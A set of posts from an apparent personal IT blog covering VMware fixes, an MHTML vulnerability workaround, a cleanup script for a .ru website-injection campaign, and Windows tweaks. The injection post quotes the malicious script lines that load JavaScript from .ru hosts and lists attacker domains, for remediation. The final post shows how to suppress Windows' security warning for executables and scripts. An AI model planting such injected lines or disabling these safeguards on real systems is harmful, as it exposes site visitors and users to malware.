vNate

I coud not find any decent functions to send notifications to my Notifo account using PHP so I made one. It’s highly customizable and easy to use. Check it out:

So if you have a bunch of queued items in your VMware vSphere Client Recent Tasks that say “Check new notifications” initiated by “VMware vCenter Update Manager Check Notification“, there is an easy fix. Here’s what it looks like:

To fix, all you have to do is restart the VMware vCenter Update Manager Service on your VCS server. See below:

You can also do a “net stop vmware-ufad-vci” then a “net start vmware-ufad-vci” as well. Let me know if this works out for you!

All Microsoft platforms since Windows XP SP3 are affected with this pretty nasty vulnerability. Referencing KB2501696 shows that this bug is caused by the way Windows handles MHTML documents. Internet Explorer is not the one at fault here, this is a Windows bug, however IE will be the attack vector for anyone wanting to take advantage of this flaw (and they will).

First off, to see if you are affected, follow this test link using Internet Explorer. If you get a popup box saying you are affected, then you should apply this fix right away. Also, make sure you are using Internet Explorer since most other browsers do not use the Windows MHTML libraries.

Microsoft gives a lame “FixIt” MSI that is not very GPO friendly. So I went out and wrote my own fix for it. It’s a batch script that you can run locally on a single computer or deploy as a “startup/shutdown script” in Group Policy without any edits needed. It is also compatible with x86 and x64 bit machines. Copy the following into your favorite text editor and give it a “.cmd” extension.

You can also click here to download it. Comment below and let me know how this works for you or if you have any other questions/comments/improvements!

Thanks!

I have put together a PHP script to automatically remove all traces of this malicious code from your website. All you have to do is upload the script to the root of your web directory then access the page with any browser. I’ve built in many features including folder and file recursion, file extension filtering, automatic file backups, and two modes of operation:  search only and search and fix.

Click here to see the .RU Removal Script in action! (demo)

or…

Click here for the .RU Removal Script Source Code

or here for it on PasteBin

Let me know in the comments if it works for you or if you have any feature requests!

Thanks to everyone commenting below, we have found out that malware on your PC is stealing your FTP credentials to websites you have access to. They have an automatic script that will login to your site using FTP and append a link to PHP and JS files containing their malicious code.

It looks like this in JavaScript files:

document.write('<sc'+'ript type="text/javascript" src="http://pocketbloke.ru/
Template.js"></scri'+'pt>');

PHP or HTML files contain the following at the end:

<script type="text/javascript" src="http://inkrainbow.ru/Template.js"></script>
<!--3848d52fcd665b3d7d96c22e5b6a5451-->

Here is a short list of some domain names that we’ve come across…

Known Malicious Domains:

• pocketbloke.ru
• inkrainbow.ru
• pantsletter.ru
• fightkid.ru
• shirtdifficulty.ru
• casechick.ru
• obscurewax.ru
• nuttypiano.com
• Many others… (comment domains you find below)

STEPS TO TAKE TO REMOVE THE THREAT:

1. Run MalwareBytes and get rid of anything on your machine
2. Uninstall your FTP client
3. Change your FTP passwords
4. Update JAVA – According to this CERT KB
5. Remove all traces of the scripts from your domains

UPDATE (8/26/2010): Now more than just .RU are involved which means the script in its current state won’t detect it. Working on a new way to detect this issue. Any ideas? Comment below.

If you get the following error when you try and clone a VM in vSphere 4:

Then you must be checking the “Edit virtual hardware (Experimental)” box when you are cloning… DON’T DO THAT! Leave it unchecked and you won’t have any problems…

Let me know if that works for you

PHP Drive Space Report

Using Google Charts API, PHP, and wmic together allows you to create awesome reports of used and free hard drive space. This is a Windows only script. Check out the code below!

Ahhhhh! This stupid thumbs.db file is showing up everywhere and I can’t get rid of it! What is it and why is it in almost every folder?

Thumbs.db is a “Windows Thumbnail Cache” file. This file stores thumbnails of all thumbnail-able items in that one folder for quicker viewing access. These include files with the following extensions: JPEG, BMP, GIF, PNG, TIFF, AVI, PDF, PPT and HTML.

Will I lose my pictures or the ability to view thumbnails if I delete this file?
No you won’t lose any data or functionality if you delete the thumbs.db file… but it will keep coming back unless you do the following:

1. Double click the “My Computer” icon on your Desktop or Start Menu to bring up an Explorer window.
2. On the top menu, click “Options” and then “Folder Options”
   
3. Click the “View” tab and check the “Do not cache thumbnails” options.
   

That’s it!

Have you ever wanted to take live screenshots of a group of PCs to see what is going on? I’ve created a PHP script that teams up with a few remote control applications that does it for you!

Features include:

• Instant screenshots of remote PCs
• Refresh any PC’s image with 1 click
• Shows currently logged on username
• Searches Active Directory for user’s information and displays full name and other custom fields
• Fully configurable and customizable

PHP SS Overview

PHP SS Zoom View

Here is a list of what you need to download:

• WAMPServer
• IrfanView
• PsExec (Included in PsTools)
• The PHP Script

After downloading all of the software, follow these steps:

1. Install WampServer to the default folders and options
2. Left click the new WampServer icon in your tray and select “Put Online”
   
3. Again, left click the new WampServer icon in your tray, choose PHP -> PHP Settings -> Uncheck “Display Errors”
   
4. Go to start, click Run…, type in “services.msc” and hit enter. Scroll all of the way down until you find “wampapache”. Double click on it to bring up the properties window.
   
5. Change the startup type to “Automatic”, then click the Log On tab. Select “This account” and enter in the credentials of a user with proper remote execution rights on the domain.
   
6. Hit OK to close the properties window, right click on the “wampapache” service and choose restart. Close the Services window
7. Extract PsTools.zip into the C:\Windows\System32 folder. Overwrite any existing files. Run PsExec.exe and click agree on the EULA.
8. Install IrfanView, after installing, copy the i_view32.exe executable and paste it into the system32 folder.
9. Open up an explorer window and browse to “C:\wamp\www” and delete the index.php file.
10. Extract the contents of the “PHPSS.zip” file into the “C:\wamp\www” folder
11. Use your favorite text editor and open up “index.php”. Lines 10-30 are made to be easily configurable to fit your network’s structure. Make sure you change the computer naming scheme to work with yours.
12. Start up a web browser and point to http://localhost and try it out! Comment and let me know how it goes

I was asked which Windows XP theme I was using in my past posts. After looking at the “Luna” theme ever since XP came out, it got boring. Here are three different themes that you can use without any hacks or 3rd pary applications because they are strait from Microsoft!

Windows XP Royale Blue and Royale Noir Theme Download

Extract the zip and place the contents of the file into “C:\Windows\Resources\Themes\”…

Double click “luna.msstyles” and the following properties box will come up:

The default theme and color scheme will be Royle. If you would like the darker theme, choose Royale Noir under color scheme:

If you are looking for the Zune theme which adds a hint of orange, download it here:

Windows XP Microsoft Zune Theme Download

This download contains an installable MSI file. Just extract the zip and double click the file to install the theme. It will look like this:

Every single time you download a program and try to run it, that stupid pop-up comes up and adds a whole extra click. The pop-up looks like this:

"Open File - Security Warning" - "The publisher could not be verified. Are you sure you want to run this software?" YES I'M SURE DAMNIT!

How do I remove this you ask? Like so:

1. Click Start, Run (or Windows+R) and type gpedit.msc

2. Navigate to User Configuration -> Administrative Templates -> Windows Components -> Attachment Manager
then double click “Inclusion list for low file types” on the right pane

3. Select Enabled and enter in the file extensions you want to allow, including the preceding period and separated with a semicolon

.exe;.cmd;.bat;.vbs;

Hit OK, exit out of your Group Policy window, and run your newly downloaded spyware infested program, free of the annoying “security” pop-up!